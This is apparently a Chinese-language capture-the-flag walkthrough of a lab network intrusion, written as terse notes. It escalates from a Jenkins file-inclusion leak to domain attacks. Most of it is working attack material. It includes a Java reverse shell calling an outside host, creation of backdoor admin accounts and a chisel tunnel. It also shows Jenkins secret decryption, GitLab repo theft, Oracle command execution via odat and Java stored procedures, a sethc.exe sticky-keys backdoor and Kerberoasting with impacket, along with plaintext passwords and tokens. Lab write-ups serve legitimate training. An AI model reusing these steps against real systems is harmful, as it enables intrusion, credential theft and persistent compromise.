fscan-ip 39.101.180.135
服务开的挺多
不知道是不是兔子
8080有Jenkins
www.zip备份文件
可以文件包含
读取C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
配置文件
http://39.101.180.135/tools/content-log.php?logfile=C:\ProgramData\Jenkins\.jenkins\secrets\initialAdminPassword
读出来这个密码510235cf43f14e83b88a9f144199655b
admin:510235cf43f14e83b88a9f144199655b
String host="8.149.142.195";
int port=9999;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());so.flush();
po.flush();
Thread.sleep(50);
try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();
s.close();
jenkins弹shell,但是这个好不稳定,换个办法吧
先传上去文件,上msf
https://8.149.142.195:60000/api/v1/d/?en=YREusySZWyqgi5vtf1n1XQ%3D%3D
巨奇怪,传上去不能执行,卡的死死的,然后弹shell也不能执行命令,无语
println "net user dionysus QWE123qwe. /add".execute().text
println "net localgroup administrators dionysus /add".execute().text
内网地址172.22.14.7
fscan开始扫描
172.22.14.11:445 open
172.22.14.7:8080 open
172.22.14.7:3306 open
172.22.14.31:1521 open
172.22.14.46:445 open
172.22.14.31:445 open
172.22.14.7:135 open
172.22.14.46:80 open
172.22.14.16:80 open
172.22.14.7:80 open
172.22.14.16:22 open
172.22.14.11:88 open
172.22.14.16:8060 open
172.22.14.46:135 open
172.22.14.7:445 open
172.22.14.46:139 open
172.22.14.31:135 open
172.22.14.31:139 open
172.22.14.11:135 open
172.22.14.11:139 open
172.22.14.7:139 open
172.22.14.16:9094 open
[*] NetInfo
[*]172.22.14.7
[->]XR-JENKINS
[->]172.22.14.7
[*] NetInfo
[*]172.22.14.31
[->]XR-ORACLE
[->]172.22.14.31
[*] NetBios 172.22.14.46 XIAORANG\XR-0923
[*] WebTitle http://172.22.14.16:8060 code:404 len:555 title:404 Not Found
[*] NetInfo
[*]172.22.14.46
[->]XR-0923
[->]172.22.14.46
[*] WebTitle http://172.22.14.7:8080 code:403 len:548 title:None
[*] NetInfo
[*]172.22.14.11
[->]XR-DC
[->]172.22.14.11
[*] NetBios 172.22.14.11 [+] DC:XIAORANG\XR-DC
[*] NetBios 172.22.14.31 WORKGROUP\XR-ORACLE
[*] WebTitle http://172.22.14.46 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.14.7 code:200 len:54603 title:XR SHOP
[*] WebTitle http://172.22.14.16 code:302 len:99 title:None 跳转url: http://172.22.14.16/users/sign_in
[*] WebTitle http://172.22.14.16/users/sign_in code:200 len:34961 title:Sign in · GitLab
(icmp) Target 172.22.14.7 is alive 本机
(icmp) Target 172.22.14.11 is alive [+] DC:XIAORANG\XR-DC
(icmp) Target 172.22.14.16 is alive web
(icmp) Target 172.22.14.31 is alive WORKGROUP\XR-ORACLE
(icmp) Target 172.22.14.46 is alive XIAORANG\XR-0923
挂个代理
.\chisel.exe client 8.149.142.195:7000 R:0.0.0.0:7777:socks
打这个172.22.14.16
C:/ProgramData/Jenkins/.jenkins/credentials.xml
管理员为 Jenkins 配置了 Gitlab,请尝试获取 Gitlab API Token,并最终获取 Gitlab 中的敏感仓库。获取敏感信息后,尝试连接至 Oracle 数据库,并获取 ORACLE 服务器控制权限。
<?xml version='1.1' encoding='UTF-8'?>
<com.cloudbees.plugins.credentials.SystemCredentialsProvider plugin="[email protected]">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl plugin="[email protected]">
<scope>GLOBAL</scope>
<id>9eca4a05-e058-4810-b952-bd6443e6d9a8</id>
<description></description>
<apiToken>{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}</apiToken>
</com.dabsquared.gitlabjenkins.connection.GitLabApiTokenImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.SystemCredentialsProvider>
{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}token在此
println(hudson.util.Secret.fromString("{AQAAABAAAAAg9+7GBocqYmo0y3H+uDK9iPsvst95F5i3QO3zafrm2TC5U24QCq0zm/GEobmrmLYh}").getPlainText())
回去jenkins解得glpat-7kD_qLH2PiQv_ywB9hz2
p4 curl --header "PRIVATE-TOKEN:glpat-7kD_qLH2PiQv_ywB9hz2" "http://172.22.14.16/api/v4/projects"
得到一堆
[
{
"id": 6,
"description": null,
"name": "Internal Secret",
"name_with_namespace": "XRLAB / Internal Secret",
"path": "internal-secret",
"path_with_namespace": "xrlab/internal-secret",
"created_at": "2022-12-25T08:30:12.362Z",
"default_branch": "main",
"tag_list": [
],
"topics": [
],
"ssh_url_to_repo": "[email protected]:xrlab/internal-secret.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/internal-secret.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/internal-secret",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T08:30:12.362Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/6",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/6/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/6/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/6/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/6/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/6/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/6/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/6/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T08:30:12.373Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [
],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 4,
"description": null,
"name": "XRAdmin",
"name_with_namespace": "XRLAB / XRAdmin",
"path": "xradmin",
"path_with_namespace": "xrlab/xradmin",
"created_at": "2022-12-25T07:48:16.751Z",
"default_branch": "main",
"tag_list": [
],
"topics": [
],
"ssh_url_to_repo": "[email protected]:xrlab/xradmin.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xradmin.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xradmin",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xradmin/-/blob/main/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2023-05-30T10:27:31.762Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/4",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/4/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/4/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/4/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/4/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/4/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/4/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/4/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:48:16.788Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": null,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [
],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": false,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 3,
"description": null,
"name": "Awenode",
"name_with_namespace": "XRLAB / Awenode",
"path": "awenode",
"path_with_namespace": "xrlab/awenode",
"created_at": "2022-12-25T07:46:43.635Z",
"default_branch": "master",
"tag_list": [
],
"topics": [
],
"ssh_url_to_repo": "[email protected]:xrlab/awenode.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/awenode.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/awenode",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/awenode/-/blob/master/README.md",
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:46:43.635Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/3",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/3/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/3/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/3/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/3/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/3/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/3/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/3/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:46:44.614Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [
],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 2,
"description": "Example GitBook site using GitLab Pages: https://pages.gitlab.io/gitbook",
"name": "XRWiki",
"name_with_namespace": "XRLAB / XRWiki",
"path": "xrwiki",
"path_with_namespace": "xrlab/xrwiki",
"created_at": "2022-12-25T07:44:18.589Z",
"default_branch": "master",
"tag_list": [
],
"topics": [
],
"ssh_url_to_repo": "[email protected]:xrlab/xrwiki.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/xrlab/xrwiki.git",
"web_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki",
"readme_url": "http://gitlab.xiaorang.lab/xrlab/xrwiki/-/blob/master/README.md",
"avatar_url": "http://gitlab.xiaorang.lab/uploads/-/system/project/avatar/2/gitbook.png",
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:44:18.589Z",
"namespace": {
"id": 8,
"name": "XRLAB",
"path": "xrlab",
"kind": "group",
"full_path": "xrlab",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/xrlab"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/2",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/2/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/2/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/2/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/2/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/2/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/2/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/2/cluster_agents"
},
"packages_enabled": true,
"empty_repo": false,
"archived": false,
"visibility": "private",
"resolve_outdated_diff_discussions": null,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:44:18.627Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": false,
"jobs_enabled": true,
"snippets_enabled": false,
"container_registry_enabled": false,
"service_desk_enabled": false,
"service_desk_address": null,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "disabled",
"builds_access_level": "enabled",
"snippets_access_level": "disabled",
"pages_access_level": "public",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "disabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 2,
"import_url": null,
"import_type": "gitlab_project",
"import_status": "finished",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [
],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": false,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": {
"access_level": 40,
"notification_level": null
},
"group_access": {
"access_level": 50,
"notification_level": 3
}
}
},
{
"id": 1,
"description": "This project is automatically generated and helps monitor this GitLab instance. [Learn more](/help/administration/monitoring/gitlab_self_monitoring_project/index).",
"name": "Monitoring",
"name_with_namespace": "GitLab Instance / Monitoring",
"path": "Monitoring",
"path_with_namespace": "gitlab-instance-23352f48/Monitoring",
"created_at": "2022-12-25T07:18:20.914Z",
"default_branch": "main",
"tag_list": [
],
"topics": [
],
"ssh_url_to_repo": "[email protected]:gitlab-instance-23352f48/Monitoring.git",
"http_url_to_repo": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring.git",
"web_url": "http://gitlab.xiaorang.lab/gitlab-instance-23352f48/Monitoring",
"readme_url": null,
"avatar_url": null,
"forks_count": 0,
"star_count": 0,
"last_activity_at": "2022-12-25T07:18:20.914Z",
"namespace": {
"id": 2,
"name": "GitLab Instance",
"path": "gitlab-instance-23352f48",
"kind": "group",
"full_path": "gitlab-instance-23352f48",
"parent_id": null,
"avatar_url": null,
"web_url": "http://gitlab.xiaorang.lab/groups/gitlab-instance-23352f48"
},
"_links": {
"self": "http://gitlab.xiaorang.lab/api/v4/projects/1",
"issues": "http://gitlab.xiaorang.lab/api/v4/projects/1/issues",
"merge_requests": "http://gitlab.xiaorang.lab/api/v4/projects/1/merge_requests",
"repo_branches": "http://gitlab.xiaorang.lab/api/v4/projects/1/repository/branches",
"labels": "http://gitlab.xiaorang.lab/api/v4/projects/1/labels",
"events": "http://gitlab.xiaorang.lab/api/v4/projects/1/events",
"members": "http://gitlab.xiaorang.lab/api/v4/projects/1/members",
"cluster_agents": "http://gitlab.xiaorang.lab/api/v4/projects/1/cluster_agents"
},
"packages_enabled": true,
"empty_repo": true,
"archived": false,
"visibility": "internal",
"resolve_outdated_diff_discussions": false,
"container_expiration_policy": {
"cadence": "1d",
"enabled": false,
"keep_n": 10,
"older_than": "90d",
"name_regex": ".*",
"name_regex_keep": null,
"next_run_at": "2022-12-26T07:18:21.108Z"
},
"issues_enabled": true,
"merge_requests_enabled": true,
"wiki_enabled": true,
"jobs_enabled": true,
"snippets_enabled": true,
"container_registry_enabled": true,
"service_desk_enabled": false,
"can_create_merge_request_in": true,
"issues_access_level": "enabled",
"repository_access_level": "enabled",
"merge_requests_access_level": "enabled",
"forking_access_level": "enabled",
"wiki_access_level": "enabled",
"builds_access_level": "enabled",
"snippets_access_level": "enabled",
"pages_access_level": "private",
"operations_access_level": "enabled",
"analytics_access_level": "enabled",
"container_registry_access_level": "enabled",
"security_and_compliance_access_level": "private",
"releases_access_level": "enabled",
"environments_access_level": "enabled",
"feature_flags_access_level": "enabled",
"infrastructure_access_level": "enabled",
"monitor_access_level": "enabled",
"emails_disabled": null,
"shared_runners_enabled": true,
"lfs_enabled": true,
"creator_id": 1,
"import_status": "none",
"open_issues_count": 0,
"ci_default_git_depth": 20,
"ci_forward_deployment_enabled": true,
"ci_job_token_scope_enabled": false,
"ci_separated_caches": true,
"ci_opt_in_jwt": false,
"ci_allow_fork_pipelines_to_run_in_parent_project": true,
"public_jobs": true,
"build_timeout": 3600,
"auto_cancel_pending_pipelines": "enabled",
"ci_config_path": null,
"shared_with_groups": [
],
"only_allow_merge_if_pipeline_succeeds": false,
"allow_merge_on_skipped_pipeline": null,
"restrict_user_defined_variables": false,
"request_access_enabled": true,
"only_allow_merge_if_all_discussions_are_resolved": false,
"remove_source_branch_after_merge": true,
"printing_merge_request_link_enabled": true,
"merge_method": "merge",
"squash_option": "default_off",
"enforce_auth_checks_on_uploads": true,
"suggestion_commit_message": null,
"merge_commit_template": null,
"squash_commit_template": null,
"issue_branch_template": null,
"auto_devops_enabled": true,
"auto_devops_deploy_strategy": "continuous",
"autoclose_referenced_issues": true,
"keep_latest_artifact": true,
"runner_token_expiration_interval": null,
"permissions": {
"project_access": null,
"group_access": null
}
}
]
克隆这三个项目
git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/internal-secret.git
git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xradmin.git
git clone http://gitlab.xiaorang.lab:[email protected]/xrlab/xrwiki.git
得到配置
cat application-druid.yml
# 数据源配置
spring:
datasource:
type: com.alibaba.druid.pool.DruidDataSource
driverClassName: oracle.jdbc.driver.OracleDriver
druid:
# 主库数据源
master:
url: jdbc:oracle:thin:@172.22.14.31:1521/orcl
username: xradmin
password: fcMyE8t9E4XdsKf
# 从库数据源
slave:
# 从数据源开关/默认关闭
enabled: false
url:
username:
password:
# 初始连接数
initialSize: 5
# 最小连接池数量
minIdle: 10
# 最大连接池数量
maxActive: 20
# 配置获取连接等待超时的时间
maxWait: 60000
# 配置间隔多久才进行一次检测,检测需要关闭的空闲连接,单位是毫秒
timeBetweenEvictionRunsMillis: 60000
# 配置一个连接在池中最小生存的时间,单位是毫秒
minEvictableIdleTimeMillis: 300000
# 配置一个连接在池中最大生存的时间,单位是毫秒
maxEvictableIdleTimeMillis: 900000
# 配置检测连接是否有效
validationQuery: SELECT 1 FROM DUAL
testWhileIdle: true
testOnBorrow: false
testOnReturn: false
webStatFilter:
enabled: true
statViewServlet:
enabled: true
# 设置白名单,不填则允许所有访问
allow:
url-pattern: /druid/*
# 控制台管理用户名和密码
login-username:
login-password:
filter:
stat:
enabled: true
# 慢SQL记录
log-slow-sql: true
slow-sql-millis: 1000
merge-sql: true
wall:
config:
multi-statement-allow: true
jdbc:oracle:thin:@172.22.14.31:1521/orcl
xradmin:fcMyE8t9E4XdsKf
用odat去连接
x64的,丢服务器上了,额,docker应该也可以额
proxychains ./odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net user dionysus QWE123qwe. /add'
proxychains odat dbmsscheduler -s 172.22.14.31 -p 1521 -d ORCL -U xradmin -P fcMyE8t9E4XdsKf --sysdba --exec 'net localgroup administrators dionysus /add'
手动选这个,navicat就链接上了
select * from v$version;
依次执行
#oracle数据库命令注入
begin dbms_java.grant_permission( 'XRADMIN', 'SYS:java.io.FilePermission', '<<ALL FILES>>', 'read,write,execute,delete');end;
begin dbms_java.grant_permission( 'XRADMIN', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', '');end;
begin dbms_java.grant_permission( 'XRADMIN', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', '' );end;
declare sql_command varchar2(32767);
begin sql_command := 'create or replace and compile java source named "Command"
as
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
public class Command {
public static String exec(String cmd) throws Exception{
Process process = Runtime.getRuntime().exec(cmd);
InputStream input = process.getInputStream();
ByteArrayOutputStream baos = new ByteArrayOutputStream();
int n;
byte[] buffer = new byte[1024];
while ((n = input.read(buffer)) != -1) {
baos.write(buffer);
}
return baos.toString();
}
}';
execute immediate sql_command;
end;
create or replace function rbexec(cmd varchar2) return varchar2 as language java name 'Command.exec(java.lang.String) return java.lang.String';
select rbexec('whoami') from dual;
然后就可以执行命令了,先加用户
net user dionysus QWE123qwe. /add
net localgroup administrators dionysus /add
上viper 拿到第二个flag
之前的好多git里还有有用的
是这样的,用evil
evil的权限好像比较高
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe
锁屏界面五下shift 直接弹cmd了
上viper,差最后一个域控
应该是改了这个cmd导致后面的猕猴桃各种报错,要先改回来
ren sethc.exe cmd.exe
然后成功拿到hash了
:bb20f831c1950cb4d14832b87ae0f48d
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':bb20f831c1950cb4d14832b87ae0f48d' -dc-ip 172.22.14.11
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/aarch64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[proxychains] Strict chain ... 8.149.142.195:7777 ... 172.22.14.11:389 ... OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
----------------------------- -------- -------------------------------------------------------- -------------------------- --------- ----------
TERMSERV/xr-0923.xiaorang.lab tianjing CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab 2023-05-30 18:25:11.564883 <never>
WWW/xr-0923.xiaorang.lab/IIS tianjing CN=Remote Management Users,CN=Builtin,DC=xiaorang,DC=lab 2023-05-30 18:25:11.564883 <never>
看到两个服务
抓hash`
proxychains impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':bb20f831c1950cb4d14832b87ae0f48d' -dc-ip 172.22.14.11 -request-user tianjing
